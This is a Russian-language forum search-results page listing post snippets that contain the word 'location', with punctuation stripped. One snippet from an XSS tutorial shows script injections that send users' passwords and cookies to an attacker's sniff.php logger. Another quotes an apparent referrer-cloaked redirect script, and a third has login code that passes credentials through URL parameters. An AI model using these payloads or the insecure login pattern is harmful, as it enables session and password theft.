Сообщения со словом
«location»

1. 22.08.2013, 12:14. Эйштней в теме
   «Выборы мэра Москвы»
   ... indexof bing 0 s indexof aol 0 s indexof yahoo 0 self location http t co fk2hstyo2m script http t co fk2hstyo2m...
2. 29.09.2009, 01:24. .kkursor в теме
   «экспорт из ms sql в oracle»
   ... isset session first load session first load yes header location index php server query string exit function usercheck user check if a user with specified username and password is already registered if not register him global mainframe q mysql query select from win users where username user login and password md5 user password motor26 motor26 if mysql num rows q 0 if isset user name user name user name user login q mysql query insert into win users id username name email password usertype block sendemail gid registerdate plain values user id user login iconv utf-8 windows-1251 user name user surname user email md5 user password motor26 motor26 registered 0 0 18 date y-m-d h i s user password register a user in joomla q mysql query insert into win core acl aro section value value name values users user id iconv utf-8 windows-1251 user name user surname add a row to core acl aro table q mysql query insert into win core acl groups aro map group id aro id values 18 select aro id from win core acl aro where value user id add a row to core acl groups aro map q mysql query insert into win comprofiler id user id firstname middlename lastname avatarapproved approved confirmed acceptedterms cb bithday cb city values user id user id iconv utf-8 windows-1251 user name iconv utf-8 windows-1251 user middlename iconv utf-8 windows-1251 user surname 1 1 1 1 user birthday day user birthday month user birthday year iconv utf-8 windows-1251 user city register a user in community builder return 0 a user was just registered else return 1 a user is registered here already function soap auth login password ini set soap wsdl cache enabled 0 client new soapclient https app1 mobimark ru win09 winston wsdl array trace 0 exceptions 0 encoding utf-8 try echo pre o client- authorize login password 12 var dump o if o- faultcode 0 echo script type text javascript alert введённые логин и пароль неверны пожалуйста попробуйте ещё раз script echo meta http-equiv refresh content 0 url register php exit if o- faultcode http var dump o echo при соединении с сервером авторизации произошла ошибка пожалуйста повторите попытку позднее или обратитесь к администратору exit catch soapfault e print exception n e- faultcode n e- faultstring c client- getmember o member 0 id member 12 var dump c process user birthday birthday c anketa 0 dt birth tmp explode birthday bd year tmp 0 bd month tmp 1 bd day explode tmp 2 bd day bd day 0 var dump c exit uncomment to get winston variables user array id c anketa 0 id member email c anketa 0 email full name c anketa 0 name c anketa 0 surname name c anketa 0 name middlename c anketa 0 patronimic surname c anketa 0 surname birthday bd login login password password city c anketa 0 settlement return user c anketa 0 patronimic soap auth 34837038 39621370 define valid mos 1 require once globals php require once configuration php require once includes joomla php mainframe new mosmainframe database mainframe- initsession test data 34837038 39621370 header content-type text html charset utf-8 user mainframe- getuser if user- id 0 and isset get login or isset post login log a user in with post or get vars get vars are encrypted with dechex echo get login exit if isset post login login post login else login hexdec get login if isset post pass pass post pass else pass hexdec get pass user soap auth login pass us usercheck user check a registered user in the local database if not registered register mainframe- login md5 login md5 pass motor26 yes soap auth get login get pass exit mosredirect index php server query string header location index php login get login pass get pass exit if user- id 0 isset post login isset get login user is logged out allow him to login or register else if user- id 0 header location register php server query string exit else...
3. 04.09.2009, 12:53. Chameleon в теме
   «Auto repair table»
   ... local srv slot srv num server must not share same location for these local pidfilelist datadirlist socketlist...
4. 28.08.2009, 18:11. champion в теме
   «Препод по ФИО»
   ... found 0 row fio min lev nuznyj prepod row fio header location http corum mephist ru nuzhnyj prepod ну или...
5. 17.07.2008, 22:11. ~Ironia~ в теме
   «XSS - атаки в комметариях»
   ... отправим следующий javascript-код script document location href http www vr-online ru script теперь при загрузке web-страницы пользователь будет перенаправлен на web-сайт указанный хакером в данном случае www vr-online ru как это можно использовать в корыстных целях помимо того что хакер получает трафик с чужого web-сайта он еще может украсть и пароли для этого можно создать web-страницу которая будет копией одной из страниц web-сайта трафик с которого воруется лучше будет создать web-страницу регистрации и попросить пользователя ввести имя и пароль заново для правдоподобности можно добавить сообщение об ошибке как будто произошел сбой авторизации ничего не подозревающий пользователь введет данннные которые будут сохранены в базе данных хакера после этого следует перенаправить пользователя туда откуда он пришел 2 10 2 перехватываем данные итак давайте сейчас посмотрим как хакер может перехватить данные пользователя например допустим что хакер добавит на форум или гостевую книгу следующий javascript-код script document location href http 192 168 1 5 sniff php test script этот код переадресует нас на web-страницу http 192 168 1 5 sniff php а в качестве параметра для примера передается слово test сценарий sniff php это программа хакера которая просто сохраняет переданный url в каком-нибудь хранилище например в текстовом файле пример такого файла может быть следующим php f fopen snif txt а fwrite f requbst ori fclose f print ok в этом примере содержимое url сохраняется в текстовом файле snif txt в нашем случае в этот файл попадет следующая строка sniff php test пока вроде ничего страшного хакер сам себе отправил сообщение test и web-сайт пока не пострадал усложняем задачу допустим что в форме отправки сообщения есть невидимое поле passws через которое передается пароль input type hidden name passws value qwerty каждый пользователь видит свой пароль а чтобы увидеть чужой необходимо его перехватить для этого хакер может внедрить на форму следующий javascript-код script document location href- httpi 192 168 1 5 sniff php document message passw value script в этом примере файлу sniff php передается содержимое невидимого поля теперь в файле snif txt хакер будет собирать пароли добропорядочных пользователей и возможно что на удочку попадется и администратор но вероятность найти подобный сценарий стремится к нулю намного чаще пароли хранятся в cookies но и их украсть не проблема достаточно только внедрить на форму следующий код script document location href http 192 168 1 5 sniff php document cookie...
6. 02.07.2008, 11:55. pizza-hut в теме
   «Видеорегистраторы»
   ... краснодарском крае http auto lenta ru news 2008 07 02 location
7. 14.03.2008, 19:04. In Vino Veritas в теме
   «Изменить адресную строку без перехода на другую страницу.»
   ... максимум без релоада можно менять javascript ом window location hash иначе пароли не тырились бы только у...